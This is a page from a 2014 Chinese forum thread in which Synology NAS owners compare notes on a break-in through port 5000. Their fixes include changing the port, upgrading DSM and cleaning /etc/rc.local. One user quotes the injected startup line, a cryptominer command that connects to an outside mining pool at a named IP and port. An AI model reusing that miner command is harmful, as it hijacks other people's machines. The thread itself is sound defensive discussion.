哦,,,那就应该是路由器上面所开了的端口被入侵的,而不是某个端口。。看来默认端口都需要自己改一下了 ...
一般有漏洞扫端口都针对某一个端口,改了可能会好点,白群晖也有这问题,只能等方案或升级了 本帖最后由 COVO 于 2014-2-13 17:08 编辑
才发现 我也中了
我是Hyper-V虚拟了两个
4.2 3202 中招 这个开了5000端口
另外一个虚拟的 4.2 3211没事 这个没开5000端口
COVO 发表于 2014-2-13 17:00
才发现 我也中了
我是Hyper-V虚拟了两个
哈哈,好 厉害 COVO 发表于 2014-2-13 17:00
才发现 我也中了
我是Hyper-V虚拟了两个
那就是5000端口出的了。。。换新版本吧。。。不然怎么办?不开端口或者换端口? js3000 发表于 2014-2-13 14:49
本帖最后由 js3000 于 2014-2-13 14:48 编辑
我没装这个补丁哈。。。该机就拿来pt和共享播放电影使用。 好像真是5000端口的问题。改成起他的重启又没事了。 js3000 发表于 2014-2-14 00:01
好像真是5000端口的问题。改成起他的重启又没事了。
5.0系统下,找了半天都没看到哪里修改5000端口的地方呢? lixiaojun666 发表于 2014-2-14 09:30
5.0系统下,找了半天都没看到哪里修改5000端口的地方呢?
5.0好像没这个漏洞了,改不改都无所谓 lixiaojun666 发表于 2014-2-13 14:23
那你怎么处理的?
我换成5.0了,有百度云。。还不错,。同步文件
主要是你的密码太简单,我的原来是123456,
用ssh进入到etc/rc.local 打开可以看到那个可恶的网址:3333 端口,删除掉,重启。 据说是被攻击了.... zhrshwww 发表于 2014-2-18 21:44
主要是你的密码太简单,我的原来是123456,
用ssh进入到etc/rc.local 打开可以看到那个可恶的网址:3333...
看你这么一说,我用winscp进入dms把rc.loacl文件下来用记事本一看,里面的内容是/var/run/httpd-log.pid -B -q -o stratum+tcp://46.249.51.176:3339
我几天前被黑,我重新启动后没这几个进程,然后改了5000端口为其他的,使用到现在没出现过那几个程序,不知道还在我机器上留下什么后门没有 在安卓手机上用es文件浏览器看见主目录有个IPC$的共享文件夹,这个共享在dsm的文件管理器上和pc共享里都没见到,不知是否可疑
页:
1
[2]